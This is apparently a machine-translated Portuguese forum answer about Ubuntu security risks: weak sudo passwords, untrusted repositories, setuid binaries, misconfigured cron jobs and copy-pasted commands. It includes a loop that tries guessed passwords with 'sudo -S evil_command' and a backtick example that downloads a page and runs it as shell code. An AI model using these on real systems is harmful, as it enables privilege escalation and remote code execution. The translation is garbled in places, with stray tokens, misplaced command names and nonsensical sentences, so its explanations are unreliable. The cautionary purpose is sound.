Não é possível colocar a senha de root em si, pois o Ubuntu desativou o usuário root por padrão. No entanto, se o seu usuário pode se tornar root através do sudo e sua senha é fácil de adivinhar / força bruta, você tem um sistema inseguro. Exemplo de script tentando testar alguma senha:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Adicionar um repositório não confiável permite que programas desse repositório sejam instalados. Mesmo se você não instalar explicitamente um aplicativo como sudo apt-get install [app-from-repo]
, o repositório ainda poderá afetar outros programas fazendo com que o Ubuntu acredite que o repositório contém uma versão mais recente de um determinado programa.
O processo de atualização é executado como raiz, caso contrário, os arquivos não podem ser gravados em /usr/bin
ou /etc
. Um disparador de instalação é executado como root também e pode executar comandos arbitrários e, possivelmente, prejudiciais. Agora, não fique preocupado, a ação manual é necessária para atualizar os programas e os repositórios do Ubuntu são seguros. Software de código fechado como o Windows nunca pode ser totalmente confiável porque você não pode verificar a fonte de código malicioso, mas você pode rever a fonte do aplicativo Ubuntu se você precisar (não se aplica a programas proprietários como sun-java6
ou Flash). / p>
Como mencionado por Javier Rivera, os bugs do kernel podem levar à execução arbitrária de código, mas os softwares com bugs são possivelmente perigosos, especialmente binarios% bin_de% binários (binários que serão executados sob o proprietário do arquivo, root) e outros programas com bugs rodando como root.
Você pode criar falhas de segurança em seu sistema se não prestar atenção ao que está fazendo. Por exemplo, sem entender completamente o conceito de cronjobs, você adicionou um cronjob a setsuid
, que executa um programa em sua pasta pessoal (por exemplo, /etc/cron.daily
. Se o arquivo myscript.sh for gravável, você pode ser excluído por você , uma exploração poderia colocar código malicioso em /bin/sh /home/your-username/myscript.sh
, que seria executado como root (escalação de privilégios).
Para se manter seguro, use sua mente! Não execute comandos de fontes não confiáveis se você não souber o que faz. Se alguém disser executar myscript.sh
com carrapatos, não o faça. 3221233674 é outra maneira de escrever 'curl 3221233674'
(IP de example.com). Então, seria igual a:
'curl http://example.com/'
Aqueles back-ticks fazem com que a saída seja executada como comandos do shell. Em inglês simples, "Faça o download da página link e tente executar a página baixada".
Primeiro, você não verá algo malicioso no comando fornecido. Mas agora, você sabe que pode ser abusado também.
Sempre verifique os comandos / scripts obtidos de fontes não confiáveis, como a Internet.